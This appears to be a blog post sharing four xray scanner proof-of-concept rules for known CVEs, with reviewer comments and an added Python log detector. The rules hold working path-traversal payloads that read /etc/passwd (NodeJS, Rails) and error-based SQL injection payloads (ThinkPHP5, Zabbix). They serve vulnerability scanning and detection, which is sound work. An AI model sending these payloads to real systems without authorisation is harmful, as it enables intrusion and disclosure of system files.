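The static file directory is not necessarily `static`.
Only the Linux case is considered. What about Windows? Could it read the source code of some application itself?
In a real environment the parameter is not necessarily id; thinkphp is not suitable for writing as a poc.
The poc content is fine; the file name and poc name have problems: https://travis-ci.org/chaitin/xray/builds/583451463?utm_source=github_status&utm_medium=notification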
NodeJS_path-validation_CVE-2017-14849.yml
name: NodeJS_path-validation_CVE-2017-14849
rules:
  - method: GET
    path: /static/../../../a/../../../../etc/passwd
    headers:
      Accept: ''
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "NodeJS 8.5.0"
  links:
    - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849
Rails_file_content_disclosure_CVE-2019-5418
name: Rails_file_content_disclosure_CVE-2019-5418
rules:
  - method: GET
    path: /robots
    headers:
      Accept: '../../../../../../../../etc/passwd{{'
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418
thinkphp5-in-sqlinjection
name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection
zabbix_3.0.3_jsrpc.php_CVE-2016-10134
name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
rules:
  - method: GET
    path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
  vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
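For the defensive side of the four rules above, a request-log check can flag the shapes they send without depending on the static directory name or the parameter name, the two assumptions the review comments call out. This is an added example, not part of the original post or of xray; the function names, the family labels and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Error-based SQL functions such as the updatexml() call in the two SQLi rules.
SQLI_FUNC = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)


def escapes_root(path):
    """True if '..' segments climb above the URL root at any point."""
    depth = 0
    # Decode %2e%2e and treat Windows-style backslashes as separators too.
    for seg in unquote(path).replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def classify(target, headers):
    """Return the sorted probe families matched by one request."""
    parts = urlsplit(target)
    hits = set()
    if escapes_root(parts.path):
        hits.add("path-traversal")
    # A legitimate Accept header holds media types, never '../' sequences.
    if "../" in unquote(headers.get("Accept", "")):
        hits.add("accept-header-traversal")
    # Check the whole query string: the function may sit in a key or a value.
    if SQLI_FUNC.search(unquote(parts.query)):
        hits.add("error-based-sqli")
    return sorted(hits)


# Constructed sample requests (request target, headers); not real log data.
SAMPLES = [
    ("/static/../../../a/../../../../etc/passwd", {"Accept": ""}),
    ("/assets/%2e%2e/%2e%2e/etc/passwd", {}),
    ("/robots", {"Accept": "../../../../../../../../etc/passwd{{"}),
    ("/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1", {}),
    ("/static/css/../site.css", {"Accept": "text/css"}),
]

if __name__ == "__main__":
    for target, headers in SAMPLES:
        print(classify(target, headers) or ["clean"], target)
```

The traversal check counts depth instead of matching a fixed prefix, so a benign `css/../site.css` that stays inside the root is not flagged.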
Source: cnblogs (博客园)
Author: 17bdw
Link: https://www.cnblogs.com/17bdw/p/11515741.html